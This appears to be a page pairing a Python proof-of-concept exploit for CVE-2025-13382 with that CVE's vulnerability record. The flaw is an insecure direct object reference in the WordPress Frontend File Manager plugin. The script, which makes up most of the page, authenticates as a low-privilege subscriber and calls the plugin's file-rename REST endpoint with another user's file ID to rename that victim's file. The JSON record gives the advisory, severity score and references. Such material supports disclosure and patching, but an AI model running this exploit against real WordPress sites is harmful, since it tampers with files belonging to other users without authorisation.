CVE-2025-13382

import requests import json # CVE-2025-13382 PoC - WordPress Frontend File Manager IDOR Vulnerability # Target: WordPress site with Frontend File Manager Plugin < 23.5 # Authentication: Requires Subscriber-level account or higher TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" TARGET_FILE_ID = 123 # ID of victim file to rename NEW_FILENAME = "malicious_renamed_file.txt" def get_auth_token(): """Obtain WordPress REST API authentication token""" login_url = f"{TARGET_URL}/wp-json/jwt-auth/v1/token" data = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=data) if response.status_code == 200: return response.json().get("token") return None def rename_victim_file(token, file_id, new_name): """Exploit IDOR vulnerability to rename victim file""" api_url = f"{TARGET_URL}/wp-json/wpfm/v1/file-rename" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } payload = { "fileid": file_id, # IDOR: No ownership validation "newfilename": new_name } response = requests.post(api_url, json=payload, headers=headers) return response.status_code, response.json() def main(): print("[*] CVE-2025-13382 PoC - Frontend File Manager IDOR") print(f"[*] Target: {TARGET_URL}") # Step 1: Authenticate token = get_auth_token() if not token: print("[-] Authentication failed") return print("[+] Authentication successful") # Step 2: Exploit IDOR vulnerability print(f"[*] Attempting to rename file ID {TARGET_FILE_ID}...") status, result = rename_victim_file(token, TARGET_FILE_ID, NEW_FILENAME) if status == 200: print(f"[+] SUCCESS: File renamed to '{NEW_FILENAME}'") print(f"[+] Response: {json.dumps(result, indent=2)}") else: print(f"[-] Attack failed with status {status}") print(f"[-] Response: {json.dumps(result, indent=2)}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13382", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:50.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Frontend File Manager Plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 23.4. This is due to the plugin not validating file ownership before processing file rename requests in the '/wpfm/v1/file-rename' REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to rename files uploaded by other users via the 'fileid' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L20", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.4/inc/classes/class.rest.php#L52", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/nmedia-user-file-uploader/tags/23.5/inc/classes/class.rest.php#L20", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa8d5feb-2ae9-44b8-90b5-9fc67226855a?source=cve", "source": "[email protected]"}]}}